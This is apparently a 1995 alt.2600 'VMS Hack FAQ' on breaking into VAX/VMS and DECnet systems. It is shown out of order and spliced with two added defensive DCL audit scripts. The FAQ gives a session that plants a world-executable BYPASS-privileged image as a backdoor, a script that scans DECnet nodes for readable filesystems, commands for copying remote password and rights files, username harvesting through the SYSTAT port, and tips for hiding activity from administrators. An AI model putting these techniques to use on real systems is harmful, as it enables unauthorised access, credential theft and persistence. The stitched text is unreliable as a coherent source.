		permits the logging of events that appear to come from the
		operating system,  so it should be granted sparingly.

BUGCHK    -     Allows the process to make bugcheck error log entries
		from user,  supervisor,  or compatibility mode or to send
		messages to the system error logger.

BYPASS    -     Allows the user's process full access to all protected
		objects,  totally bypassing UIC-based protection,
		ACL protection (Access Control List) and mandatory
		access controls.   Users with this privilege can
		modify authorization records (SYSUAF.DAT,  where
		usernames/passwords are stored),  rights identifiers
		(RIGHTSLIST.DAT),  DECnet object passwords and accounts
		(NETOBJECT.DAT),  and have unlimited file access.

CMEXEC    -     Allows the user's process to execute the Change Mode to
		Executive system service.

CMKRNL    -     Allows the user's process to execute the Change Mode to
		Kernel system service.   These two privileges allow
		things like modifying multiprocessor operation (START/
		CPU,  STOP/CPU type commands),  modifying the system
		rights list (SET RIGHTS_LIST/ATTRIBUTES),  changing a
		process's UIC (SET UIC),  and other functions.

DETACH    -     Processes can create detached processes that have their
		own UIC without the DETACH privilege;  the DETACH privilege
		is needed only when the process wants to specify a different
		UIC for the detached process.

DIAGNOSE  -     Lets a process run online diagnostic programs and intercept
		and copy all messages written to the error log file. 

DOWNGRADE -     Permits a process to manipulate mandatory access controls.

EXQUOTA   -     Allows the space taken by the user's files on a given
		disk volume to exceed any usage quotas set for the user
		(as determined by UIC) on that volume.

GROUP     -     Allows the user's process to affect other processes in its
		own group.

GRPNAME   -     Lets the user's process bypass access controls
		and insert names into (and delete from) the logical name table
		of the group to which the process belongs by use of the
		Create Logical Name and Delete Logical Name system services.

GRPPRV    -     When the process's group matches the group of the object
		owner,  the GRPPRV privilege gives a process the access rights
		provided by the object's system protection field.  GRPPRV
		also lets a process change the protection or the
		ownership of any object whose owner group matches the
		process's group by using the DCL command SET SECURITY.

IMPORT    -     Lets a process manipulate mandatory access controls.  The
		privilege lets a process mount unlabeled tape volumes.  
		This privilege is reserved for enhanced security products
		like SEVMS. 

LOG_IO    -     Lets the user's process execute the Queue I/O request
		($QIO) system service to perform logical-level I/O
		operations.

MOUNT     -     Lets the user's process execute the mount volume QIO
		function. 

NETMBX    -     Lets a process perform functions related to a DECnet
		computer network.

OPER      -     Allows a process to use the Operator Communications
		Manager (OPCOM) process to reply to users' requests,
		to broadcast messages to all terminals logged in,  to
		designate terminals as operator terminals and specify
		the types of messages to be displayed on these operator
		terminals,  and to initialize and control the log file
		of operator messages.

PFNMAP    -     Lets a user's process create and map page frame number
		(PFN) global sections to specific pages of physical 
		memory or I/O device registers,  no matter who is using
		the pages or registers. 

PHY_IO    -     Lets the user's process execute the Queue I/O request
		($QIO) system service to perform physical-level I/O
		operations.

PRMCEB    -     Lets the user's process create or delete a permanent
		common even flag cluster by executing the Associate 
		Common Event Flag Cluster. 

PRMGBL    -     Lets the user's process create or delete permanent 
		global section by executing the Create and Map Section
		or Delete Global Section system service.  In addition
		,  a process with this privilege (plus CMKRNL and SYSGLB
		privileges) can use the Install utility (INSTALL)

PRMMBX    -     Lets user's process create or delete permanent mailbox
		by the Create Mailbox and Assign Channel system service
		or the DElete Mailbox system service.   Mailboxes are
		buffers in virtual memory that are treated as if they were
		record oriented I/O devices.  A mailbox is used for
		general interprocess communications. 

PSWAPM    -     Lets the user's process control whether is can be 
		swapped out of the balance set by executing the 
		Set Process Swap Mode system service. 

READALL   -     Lets the process bypass existing restrictions that would
		otherwise prevent the process from reading an object. 
		Unlike the BYPASS privilege which will permits writing and
		deleting,  READALL permits only the reading of objects
		and allow updating of such backup-related file
		characteristics as the backup date. 

SECURITY  -     Lets a process perform security related functions such
		as modifying the system password with the DCL command
		SET PASSWORD /SYSTEM or modifying the system alarm 
		and auditing settings using the DCL command 
		SET AUDIT.  

SETPRV    -     Lets user's create process whose privileges are greater
		than its own.   With this privilege,  a user can obtain
		any other privilege via the DCL command "SET PROCESS/
		PRIV"

SHARE     -     Lets process assign channels to devices allocated to other
		processes or to a non-shared device the Assign I/O Channel
		system service. 

SHMEM     -     Lets the user's process create global sections and 
		mailboxes (permanent or temporary_ in memory shared by
		multiple processors if the process also has appropriate
		PRMGBL,  PRMMBX,  SYSGBL,  and TMPMBX privileges. 

SYSGBL    -     Lets user;s create or delete system global sections by
		executing the Create and Map Sections or the Delete
		Global Section system services.  With this privilege
		and CMKRNL and PRMGBL,  the Install command (INSTALL)
		can be used. 

SYSNAM    -     Let's user's process bypass discrepancy access
		controls and insert names into the system logical
		name table and delete names from that table.  A
		process with this privilege can use the DCL commands
		ASSIGN and DEFINE to add names to the system logical
		in the user or executive mode and can use the DEASSIGN
		command in either mode to delete names from the 
		table. 

SYSPRV    -     Lets a process access security objects by the system
		protection field and also read and modify the owner
		(UIC),  the UIC-based protection code,  and the ACL 
		of and object.   Any processes with this privilege
		can add,  modify,  or delete entries in the system
		user authorization file (SYSUAF.DAT)

TMPMBX    -     Lets user's create process create a temporary mailbox
		by executing the Create Mailbox and Assign Channel. 

UPGRADE   -     Lets a process manipulate access controls.  This privilege
		is reserved for enhanced security products like SEVMS.

VOLPRO    -     Lets user's processes:
			o Initialize a previously used volume with an owner
			  UIC different from the user's own UIC.
			o Override the expiration date on a tape or
			  disk owned by another user. 
			o Use the ////FOREIGN qualifier to mount a Files-11
			  volume owned by another user.
			o Override the owner UIC protection of volume. 

WORLD     -     Lets user's process affect (suspend, resume, delete, 
		set priority, wake,  etc) other processes both inside
		and outside its group.

				- Taken Mostly From the, "OpenVMS VAX
				  System Security" (V6.0) 

2.      "How can I make a SUID Shell in VMS".... 

	Simple...  You can't.   Privileges are handled quite differently
	from Unix (see "How are user privileges set up").  What you can
	do is install a program (image) so that,  while it executes,
	the process running it gains the privileges the image was
	"installed" with.    For example,  if you write a program that
	needs read access to SYSUAF.DAT you *could* make SYSUAF.DAT
	world readable (if you are on a privileged account,  of course),
	but this would be very,  very unwise.    The other method is to 
	"INSTALL" the executable image with the READALL privilege, 
	so that when a user's process runs your program,  that process
	(the image running) gets READALL for as long as the image is
	running.   That process can then read SYSUAF.DAT,  but outside
	the image the user's process cannot.  

	With this in mind,   it is possible to create a scenario similar
	to that of a "SUID shell" (but without the shell).  The idea
	is to put the privileges you want to keep hold of on a program
	that does nothing more than call LIB$SPAWN to create another
	process (which drops you to DCL),  and,  using the VMS "INSTALL"
	utility,  give that image the privileges you wish the spawned
	process to have.  There are several drawbacks.  To accomplish
	this you need CMKRNL privilege yourself (on your process) to run
	INSTALL,  so your process must already be privileged to pull it
	off.  The point is that,  in the event a user has obtained a
	"privileged account" and wishes to remain privileged,  he/she
	can install an image that a normal (non-privileged) user can
	run to obtain the system privileges again. 

	Below is a sample session capture of me installing a privileged
	image.   The privilege I gave this image is BYPASS (bypass
	all security features,  including the ability to modify SYSUAF.DAT
	and RIGHTSLIST.DAT). 

Trying...
Connected to UpperDck
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: SYSTEM   ! Login to our privileged account
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:17
    Last non-interactive login on Thursday, 22-DEC-1994 15:51

 User= SYSTEM       Directory= [SYSMGR]       UIC=  [1,4]
	Terminal= NTY5:       6-JAN-1995 07:19:01.00

sysm>basic      ! I am going to use VMS BASIC,  but use anything you want

VAX BASIC V2.3

Ready

10 external long function lib$spawn ! Call "SPAWN" library.  The idea with this
   declare long xspawn              ! program is to give us another "spawned"
   xspawn=lib$spawn()               ! process. 

save mytrap             ! Save this program
Ready

exit                    ! and exit the VMS BASIC. 
sysm>dir mytrap*.*      ! Just to show our file. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        

Total of 1 file.
sysm>basic mytrap       ! This will compile and make our object code
sysm>dir mytrap*.*      ! To show our object code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.OBJ;1        

Total of 2 files.

sysm>link mytrap/notraceback  ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.*            ! To show our executable code. 

Directory SYS$SYSROOT:[SYSMGR]

MYTRAP.BAS;1        MYTRAP.EXE;1        MYTRAP.OBJ;1        

Total of 3 files.

sysm>copy mytrap.exe sys$system:  ! copy it to sys$system: [this is silly] 
sysm>install                      ! Run install to set up priv's on our image.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full            ! Just to show off the image priv's

DISK$VAXVMSRL5:<SYS6.SYSEXE>.EXE
   MYTRAP;2                       Prv 
	Entry access count         = 0
	Privileges = BYPASS 

INSTALL> exit                    ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe   ! And just to show its still there

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2        MYTRAP.EXE;1        

Total of 2 files.

sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...

Directory SYS$SYSROOT:[SYSEXE]

MYTRAP.EXE;2                  File ID:  (43314,33,0)       
Size:            4/6          Owner:    [1,4]
Created:   6-JAN-1995 07:20:26.35
Revised:   6-JAN-1995 07:20:41.54 (2)
Expires:   <None specified>
Backup:    <No backup recorded>
File organization:  Sequential
File attributes:    Allocation: 6, Extend: 0, Global buffer count: 0
		    No version limit, Contiguous best try
Record format:      Fixed length 512 byte records
Record attributes:  None
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log                                               ! read/execute. Logout. 

  SYSTEM       logged out at  6-JAN-1995 07:42:02.55
Connection closed by foreign host.

	[Now,  we make a new connection to the system to test our ]
	[ "MYTRAP.EXE" with the image priv's attached to it       ]

Trying...
Connected to UpperDck.
Escape character is '^]'.

		       Upper-Dck VMS Development System 

Username: JOEBOB        ! Now, log as a normal user. 
Password: 
	Welcome to VAX/VMS version V5.2 on node UPPERDCK
    Last interactive login on Friday,  6-JAN-1995 07:14

 User= JOEBOB        Directory= [UPPERDCK]       UIC=  [130,163]
	Terminal= NTY6:       6-JAN-1995 07:42:12.00

UPDCK> show process/priv ! To prove that we have normal user priv's

 6-JAN-1995 07:42:27.01   User: JOEBOB           Process ID:   0000010F
			  Node: UPPERDCK         Process name: "JOEBOB"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set proc/priv=bypass ! To prove I can't enable "BYPASS" priv's
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap           ! Run our little "privilege provider"
UPDCK> show process/priv    ! To show our priv's after we exec. MYTRAP.EXE
			    ! note that we are spawned (see PID and Proc. Name)

 6-JAN-1995 07:42:46.05   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> set process/priv=bypass ! Note,  no error when we do this now. 
UPDCK> show process/priv       ! To prove that we have gained BYPASS

 6-JAN-1995 07:42:53.37   User: JOEBOB           Process ID:   00000110
			  Node: UPPERDCK         Process name: "JOEBOB_1"

Process privileges:
 TMPMBX               may create temporary mailbox
 NETMBX               may create network device
 BYPASS               bypasses UIC checking 

Process rights identifiers:
 INTERACTIVE
 LOCAL
 SYS$NODE_UPPERDCK
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
  Process JOEBOB_1 logged out at  6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely

  JOEBOB       logged out at  6-JAN-1995 07:43:05.11
Connection closed by foreign host.

   (Grr.. This needs to be re-written.. doesn't it....) 
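	The system manager's check for the trick above,  as an added
	example that is not part of this FAQ:  a DCL procedure that walks
	the output of INSTALL LIST/FULL and reports every image installed
	with privileges together with its file protection,  so a
	world-executable "mytrap"-style image stands out.   It assumes the
	INSTALL LIST/FULL layout shown in the session capture (a directory
	line in column 0,  then an indented "NAME;version ... Prv" line,
	then "Privileges = ..." lines),  that F$FILE_ATTRIBUTES with the
	"PRO" item returns the protection as a string of the form
	"SYSTEM=RWED, OWNER=RWED, GROUP=RE, WORLD=RE",  and that
	F$FAO("!_") yields a tab character.   The file name
	AUDIT_PRIV_IMAGES.COM is made up. 

```dcl
$! AUDIT_PRIV_IMAGES.COM  --  added example,  not part of the FAQ.
$! Report every installed image that carries privileges,  with its file
$! protection,  so a "mytrap"-style image that is World:RE stands out.
$! Assumes the INSTALL LIST/FULL layout shown in the session capture.
$ say := write sys$output
$ tab = f$fao("!_")                             ! !_ = tab (assumption)
$ listing = "sys$scratch:install_priv.lis"
$ define/user_mode sys$output 'listing'         ! Capture INSTALL's output
$ install list/full
$ open/read lis 'listing'
$ on warning then goto done
$ dirpart = ""
$ image   = ""
$ priv    = 0
$ loop:
$   read/end_of_file=done lis line
$   if line .eqs. "" then goto loop
$   first = f$extract(0,1,line)
$   if first .nes. " " .and. first .nes. tab    ! Column 0: a directory line,
$   then                                        ! e.g. DISK$X:<SYS6.SYSEXE>.EXE
$       dirpart = f$parse(line,,,"DEVICE","SYNTAX_ONLY") + -
                  f$parse(line,,,"DIRECTORY","SYNTAX_ONLY")
$       priv = 0
$       goto loop
$   endif
$   clean = f$edit(line,"TRIM,COMPRESS")
$   spec  = f$element(0," ",clean)
$   if f$locate(";",spec) .lt. f$length(spec)   ! "NAME;ver  flags..." line
$   then
$       image = dirpart + f$element(0,";",spec) + ".EXE;" + f$element(1,";",spec)
$       priv  = f$locate("Prv",clean) .lt. f$length(clean)  ! Prv = installed /PRIV
$       goto loop
$   endif
$   if .not. priv then goto loop                ! Only care about /PRIV images
$   if f$locate("Privileges",clean) .eq. f$length(clean) then goto loop
$!  Protection string assumed to look like
$!  "SYSTEM=RWED, OWNER=RWED, GROUP=RE, WORLD=RE"; field 3 is WORLD
$   prot  = f$file_attributes(image,"PRO")
$   world = f$element(3,",",prot)
$   flag  = ""
$   if f$locate("E",world) .lt. f$length(world) then flag = "   <== world can execute"
$   say image
$   say "    ", clean
$   say "    Protection: ", prot, flag
$   goto loop
$ done:
$   close/error=nofile lis
$   delete/nolog 'listing';*
$ nofile:
$ exit
```

	Run it as @AUDIT_PRIV_IMAGES from a privileged account.  An image
	with "Privileges = BYPASS" (or SETPRV,  CMKRNL,  SYSPRV) whose
	WORLD field contains E is exactly the situation the session above
	sets up;  compare the list against the images the system manager
	actually meant to install (SYS$MANAGER:VMSIMAGES.DAT on the
	releases that use it) and remove anything unexpected with
	INSTALL DELETE. 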

	     -     Using DEC's Network to your advantage     -

1.      "What is a DECNet?"

"DECNet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.  

"A DECNet network links computers into flexible configurations to exchange
information,  share resources,  and perform distributed processing.  DECNet
distributed processing capabilities also allow information to be originated
anywhere in the network."

		- VMS Version 5.0 DECnet "Guide to DECNet - VAX Networking"

	DECNet can support from 2 up to 64,000 nodes,  and can span
	multiple operating environments (VMS,  Ultrix,  RSX and,  with
	the correct hardware,  IBM PC's,  VAXmate's,  etc.) over a variety
	of LAN/WAN links.  Using PSI,  a DECNet system can also run over
	packet switching networks (like Tymnet and Sprintnet). 

	DECNet allows easy access to information from system to system,
	assuming you have the NETMBX privilege.

	To get a list of DECNet objects, "$MCR NCP SHOW KNOWN OBJECTS".

2.      "This is great,  what does it mean to me."

	You can use DECNet to grab information/files/programs and use
	them to your own advantage (granted that security has not 
	been completely implemented... which is usually the case
	on a vanilla/default install)

	For instance,  if an intruder were to break into a system
	which was part of a DECNet,  he/she might be able to access files on
	remote systems/nodes of that DECNet.  As stated,   DECNets
	can range from local machines in one area (a LAN) to networks
	that stretch across the world.  

3.      "How would I get to that information on a remote node?"

	All from DCL,  using the default (unprivileged) DECNet account,  or
	possibly a privileged proxy account,  on the remote node,  with
	commands like "DIRECTORY",  "COPY",  "TYPE",  etc.   Usually this is
	done by adding the node name at the beginning of the file
	specification.  For example

$ DIR NODE::            ! Example format.

	or 

$ DIR NODE::SYS$COMMON:[SYSEXE]  ! Shows logical SYS$COMMON and the SYSEXE
				 ! Directory on the remote node. 

	or

$ COPY NODE::DISK1:[BOB]SECRET.TXT []  ! The "[]" means "wherever i am"

	Remember DECNet object logs are being kept!

4.      "What if I want to connect and use the nodes interactively?". 

	One of two ways.  Either way requires NETMBX privilege. Try to
	"SET HOST [NODENAME]".  If that fails, 
	try to use NCP (Network Control Program),  like this.....

$ MCR NCP CONNECT NODE [NODENAME]

5.      "Well, Gee,  that's wonderful.  How do I find connectable nodes
	that are on the DECNet?"

	Once again,  this information can be found using NCP (or
	via a "SHOW NETWORK" command).  "SHOW NETWORK" won't work  
	if you are on a non-routing node.  You might not get a 
	*complete* listing,  because the host you are on might not 
	know all DECNet nodes,  but it will at least get you hopping 
	around on the DECNet.  This list can be obtained by executing.....

$ MCR NCP SHOW KNOWN NODES   ! (The node database lives in
			     !  SYS$SYSTEM:NETNODE_LOCAL.DAT and
			     !  SYS$SYSTEM:NETNODE_REMOTE.DAT)

	This will dump a list.  You can sort through the information 
	using the NCP CONNECT command,  and see what sorts 
	of things you run into (Xyplex/DECservers,  other VMS machines, 
	SNA gateway controllers,  etc, etc).  If you are only interested
	in machines that you can get file information from,  you can 
	use the following command file to find nodes that you can
	use. 

$! DECNETFIND  Version 1.0
$! Coded By The Beaver
$! Jan 5th,  1995
$!
$! The intent of this code is to scan for remote,  connectable nodes that
$! the VMS host knows about (via NCP) and build a list.  Once this list
$! has been created,  we check to see if the remote machine 1> is VMS
$! (later revs. will include Ultrix/OSF(?)),  2> can be directly
$! accessed via the DECNet,  and 3> lets us read file systems on the
$! remote node.  Nodes that are "successful" are stored away.  This
$! prevents mucho time-consuming scanning by hand.  
$!
$!
$ on error then goto err                        ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. ""                                ! Yes, output file helps 
$       then
$       say "DECNet VMS Node Finder Version 1.0                   1995"
$       say "Coded By The Beaver"
$       say ""
$       say "Usage:"
$       say "@DECNETFIND [Outfile]"
$       exit
$       endif
$!
$ say "Building Node List Via NCP....(Working)"
$!
$ mcr ncp show known nodes to nodes.out  ! Fire up NCP and dump node list
$ open/read in nodes.out                 ! Open to read
$ open/write nodelist 'p1'               ! "Success" storage area. 
$!
$ loop1:
$ on severe_error then goto loop1        ! Re-armed every pass (DCL resets the
$                                        ! ON action once it fires) so a fatal
$                                        ! status from "dir ::" doesn't kill us
$ read/end_of_file=end in line
$       name = f$element(0, ")", f$element(1, "(", line)) ! grab a nodename
$       if name .gts. "("                ! f$element yields "(" when no match
$         then  
$         say "**************************************************************"
$         say "Nodename: "+name
$         say ""
$         dir 'name'::          ! See if we can get to it via a DECNet DIR::
$         if $severity .nes. "1"
$               then
$               say "Status:  Node Unreachable Via DECNet Dir::"
$               else
$               say "Status:  Found Good Node. [Logged]"
$               write nodelist name             ! Log it.
$               endif
$         endif
$ goto loop1
$ err:
$ say "Ouch.  There has been an error!"
$ end:
$ close in
$ close nodelist                ! Close up and leave,  exit stage
$ delete nodes.out;*            ! right
$ say "Complete!"
$ exit

	"That works great,  but I ran into a Unix (Ultrix) machine,  and 
	when I do a 'DIR NODENAME::' it only gives me some user's 
	home directory.   Is there any way I can grab files and directory
	listings off the remote (Ultrix) machine?"

	Once again,  no problem.   Format the command like this:

$ DIR NODE::"/etc"      ! will give remote nodes /etc directory

	Or to grab the /etc/passwd file on the remote node,  try....

$ TYPE NODE::"/etc/passwd"   ! And open a capture buffer. 

	"Can I grab a VMS rights list?"

$ COPY NODE::"SYS$SYSTEM:RIGHTSLIST.DAT" RIGHTSLIST.DAT

6.  "Can't DECNet be protected more against this generic attack?"

	Sure,  by disabling the DECNet account and by watching any
	proxy accounts that may be set up (probably not a good idea to
	have a proxy into a privileged account). Unless a proxy account is
	set up (SYS$SYSTEM:NETPROXY.DAT), users must supply a password when
	attempting to do network operations like above.  Proxy logins are
	formatted below:

	(This example is using the DCL COPY command)

	COPY remotenode"proxyaccount"::filename filename

	for example, 

	COPY ADAM"BOB"::SECURITY.TXT MYSECURITY.TXT

	(BOB - The Proxy login name)

	However,  in a vanilla VMS (i.e. a default installation), 
	proxy logins are not enabled. 

7.      "Are proxy logins logged.. Can I write a routine that will
	attempt proxy accounts to break into remote machines?"

	You bet that proxy logins are logged.   Repeated invalid 
	attempts will inform the administrators that a "NETWORK
	BREAK IN" is in progress (via the OPCOM process). 
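	The system manager's side of sections 6 and 7,  as an added
	example that is not part of this FAQ:  list the proxy database,
	show which local account the default DECNet access maps to,  and
	enable the network break-in and login-failure alarms that make the
	probing described above show up on the operator terminal.   The
	AUTHORIZE SHOW/PROXY,  NCP SHOW EXECUTOR CHARACTERISTICS and
	SET AUDIT/ALARM/ENABLE spellings are from the V5/V6-era manuals
	and should be checked against HELP on the target release;
	DECNET_ACCESS_CHECK.COM is a made-up name. 

```dcl
$! DECNET_ACCESS_CHECK.COM  --  added example,  not part of the FAQ.
$! Needs SYSPRV (for AUTHORIZE) and SECURITY (for SET AUDIT) to complete.
$ say := write sys$output
$ on warning then continue                  ! Keep going if one step fails
$ say "---- Proxy entries (SYS$SYSTEM:NETPROXY.DAT) ----"
$ say "Look for proxies that land in SYSTEM or other privileged accounts."
$ set default sys$system                    ! AUTHORIZE looks for NETPROXY here
$ mcr authorize show/proxy *::*
$ say "---- Default DECnet access account ----"
$ say "The 'Nonprivileged user id' line is the account DIR NODE:: runs as."
$ mcr ncp show executor characteristics
$ say "---- Alarms for network break-ins and login failures ----"
$ set audit/alarm/enable=(breakin=network,logfailure=network)
$ show audit
$ exit
```

	With the alarm enabled,  the repeated proxy and default-account
	probing from DECNETFIND above is what produces the "NETWORK
	BREAK IN" messages the section mentions;  the same OPCOM output
	is where to look when hunting for it. 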

*8.      Sneak Routing

	You can access a machine you normally couldn't by piggy-backing
	over a machine you can reach through the DECNet account (one that
	can in turn reach the machine you can't).  This is called "Poor
	Man's Routing".  It is preventable by the sysadmin on the
	piggyback machine.

		-       TCP/IP Networked Machines        - 

1.  "I have found a remote VMS machine on a TCP/IP network (I.E. 
     the Internet).   I have tried to finger the remote system in
     order to start collecting usernames,   I get a 'connection
     refused'.... Now what?"

	Connect to the SYSTAT port (Port 11).  This will give jobs
	currently running on the system.  More than likely,  this
	port has been left open.  With this in mind,  you can 
	sort through all the jobs and grab usernames,  while excluding
	system jobs (I.E - SWAPPER,  ERRFMT,  AUDIT_SERVER, 
	JOB_CONTROL,  NETACP,  EVL,  REMACP,  SYMBIONT*,  
	XYP_SERVER,   OPCOM,  INET_SERVERS, etc....etc).  

	Also,  I find one great trick is to look for "Student" type
	accounts.  That is,  accounts that appear to be repetitive. 
	You can then predict possible usernames. 

	The above can be accomplished by using the below command
	(In most cases):

$ TELNET SITE.ADDRESS.COM /PORT=11

	Try other ports as well.  Netstat is port 15.

2.      "On Unix machines,  I can make a symbolic link to a 'questionable'
	command,   so that is appears that I am doing one thing when 
	I am really doing another (Or copying and renaming the command). 
	Is there anyway I can make it appear that I am doing something 
	that I am not?". 

	When the command "finger" or "w" is issued,  a user/administrator
	can see what image is currently being executed by a particular
	user.   For example's sake,  let's say you want to play with 
	NCP but you know that if the administrators see you in NCP, 
	they will get rather irate and kick you off the system. 
	You can make it appear that you are doing something else 
	by:

	a>  Copying the image,  renaming it,  and running it. [which
	    may or may not work]. 

*3.    TCPDUMP

	Multinet(and probably other TCP/IP implementations on VMS) provides
	the sniffer program TCPDUMP, but of course you must be privileged
	to use it.

-	Note;  On systems using older versions of VMS Multinet, 
	FTP is not logged to console (via OPCOM process).  It _is_
	logged,  but the operator is not informed.   With this in 
	mind,  you can use this to "test" accounts on remote systems.

Final Notes: 

	This FAQ is far from complete,  and will remain in its "beta"
	stages for sometime.  

	I would like to thank Tsywt for his input and great information.

	I got a lot of mail from a lot of people. 

	- Things that need to be added/updates:

	  Information on the OPCOM process....

	- What we are looking for:

	  Ways of intercepting VMS communications(through mailboxes, etc.)

	  Passing commands via VMS mail.

	  Disk scavenging programs(along the lines of an "UNDELETE")

	  Xterm,Motif security

	  Various methods of machine spoofing(via TCP/IP,LAT,etc.)

	  File hacks with 'dump', 'patch', VFE, etc.

	  Anything else we might have missed.

	beave@vistech.net 

	"It ain't done,  but hey... It a fucking start......"

The VMS Hack FAQ by The Beaver and Tsywt Version 0.02 (August 18, 1995)

From: anon-remailer@utopia.hacktic.nl (Anonymous)
Newsgroups: alt.2600
Subject: VMS Hack FAQ (part 1)
Date: 18 Aug 1995 06:45:14 +0200

		- VMS HACK FAQ (Frequently Ask Questions) -

			  - Beta 0.02 Release -

			 originally by The Beaver
			    updated by Tsywt  

Introduction:

	This article contains the answers to some frequently asked questions
	(hence the name FAQ) about hacking the VMS operating system. 

	"Why a VMS Hacking FAQ?"

	Several reasons.    Once in a while,   an escape from Unix is
	very,  very nice.   Another reason is that the art of 
	VMS hacking has all but vanished,  and its replacement is
	statements like,  "Hacking VMS is impossible", "VMS is
	too cryptic to use",  and as always,  "Man,  VMS sucks". 

	These are generally statements by people who know almost 
	zero about VMS.   I don't want to go into a "which OS is
	better" argument,  because that would defeat the purpose of this 
	file,  but in my personal opinion,   both OS's have 
	their advantages and disadvantages. 

	I have,  however,  written this FAQ with a Unix overtone
	to it,  to help the reader understand what is being 
	accomplished in some examples. 

	The article may be freely redistributed in its entirety provided
	that credits are not altered or removed.   It may not be 
	sold for profit or incorporated in commercial documents without
	the written permission of the author(s). 

	This is the beta release of this article,   which means 
	the article is still in the works and is not complete. 

	Submissions,  corrections,  comments,  input,  complaints, 
	bomb threats,   cash,  etc.,  should be directed toward
	the alt.2600 newsgroup. 

Index ---:

More Common Newbie Questions:

1.  VMS Basic information ("What does VMS run on?")
2.  Password storage information (SYSUAF.DAT) ("Where the hell is the 
    /etc/passwd file??!?!?!")
3.  User storage information (RIGHTSLIST.DAT)
4.  Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
    machines?")
5.  Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
6.  SET DEFAULT command ("How do I change the damn directory?")
7.  The infamous "CD" .COM file ("I hate this SET DEFAULT crap") 
8.  LOGIN.COM ("Okay,  where's my .profile???").
9.  Captive Accounts ("I can't get to DCL"). 
10. Terminal Spoofing ("How can I passively gather passwords at a terminal?")
11. User Impersonation ("Can I masquerade as another user?")
12. Accounting/Auditing ("Who's watching me?")

VMS Mail Hack Routines:

1.  Fake Mail ("How do I send fake mail to VMS machines?")
2.  Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
3.  Mail Bomb ("I need to mailbomb a user from my VMS account,  how?)

VMS Phone Hack Routines:

1.  Anonymous Phone Messages("How do I become a VAXPhone phreaker?")
2.  Phone Directories("How can I do a 'sh users' using the phone protocol?")

User/Image Privilege Information:

1.  Systems Privileges, Listing and explanation ("How are Priv's setup?")
2.  Creating privileged images ("Can I create a SUID Shell on a VMS box?")

DECNetwork Information.

1.  Brief Description of a DECNet ("What's a DECNet?")
2.  What it means to you ("What can it do for me?")
3.  Obtaining files/system info/etc ("How do I get information for the remote?")
4.  Using remote nodes ("How do I connect interactively?")
5.  Getting node lists ("How do I find connectable nodes?")
6.  Proxy Logins ("Can't DECNet nodes be protected?")
7.  Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?") 
8.  Sneak Routing ("Can I get to a machine I normally couldn't through another
    machine?")

TCP/IP Connected VMS Machines. 

1.  Obtaining remote usernames without "FINGER" ("How do I get usernames
    if FINGER is disabled")
2.  Changing the image running in FINGER ("How do I link a command name to
    another so it appears I am running a different image?")
3.  The TCPDUMP sniffer

		-      More Common Newbie Questions      -

1.      "What does VMS run on?"

	VMS (Virtual Memory System) runs on Digital Equipment Corp. 
	(DEC - pronounced "DECK") VAX (Virtual Address eXtension)
	machines and the newer Alphas.   The user uses DCL (DEC Command
	Language) to interact with the computer.  These commands
	and their syntax are completely different from those of
	Unix and Unix-like operating systems,  thus a completely
	different mindset is often required (this is the author's
	opinion). 

2.      "Where in the hell is the passwd file???!?!?!"

	There is no /etc/passwd file.  All user information is kept in
	a file called SYSUAF.DAT,  which is stored in the directory
	(or rather,  the logical) SYS$SYSTEM.   This file is normally
	not readable by "normal" users.
	VMS standard accounts (SYSTEM, FIELD, etc.) no longer have default
	passwords. 

3.      One file that is available to "normal" users is
	SYS$SYSTEM:RIGHTSLIST.DAT. This file has a list of users and
	their respective rights identifiers. Since the file isn't very
	readable, an extraction program is a nice tool to have. The
	following DCL procedure is just an example of such a program and
	probably shouldn't be used, especially on a large system, because
	of its inefficiency. It should lead you in the right direction
	though.

$! Program: Extract_Rights.Com
$! Author: Tsywt
$!
$ On Error Then $Goto Exit
$!
$ If F$mode() .Nes. "INTERACTIVE" then goto BATCH_END
$
$ Inquire system "Please enter system"
$ If system .eqs. ""
$  Then
$   Open/share in sys$system:rightslist.dat
$ Else
$   Open/share in 'system'::sys$system:rightslist.dat
$ Endif
$ Open/write out users.dat
$ Read/nolock in record
$Read_Loop1:
$ Read/nolock in record /end=Done_Users
$! If not at start of environmental identifiers
$ If f$extract(16,6,record) .nes. "BATCH "
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Else
$   Goto Done_Users
$ Endif
$ Goto Read_Loop1
$Done_Users:
$ Close out
$ Open/write out rights.dat
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$Read_Loop7:
$ Read/nolock in record /end=Done_Rights
$! holder is null
$ If f$extract(8,1,record) .eqs. ""
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Endif
$ Goto Read_Loop7
$Done_Rights:
$ Close out
$!
$ Open/write out users_ids.dat
$ Open in2 users.dat
$Read_Loop2:
$ position = 0
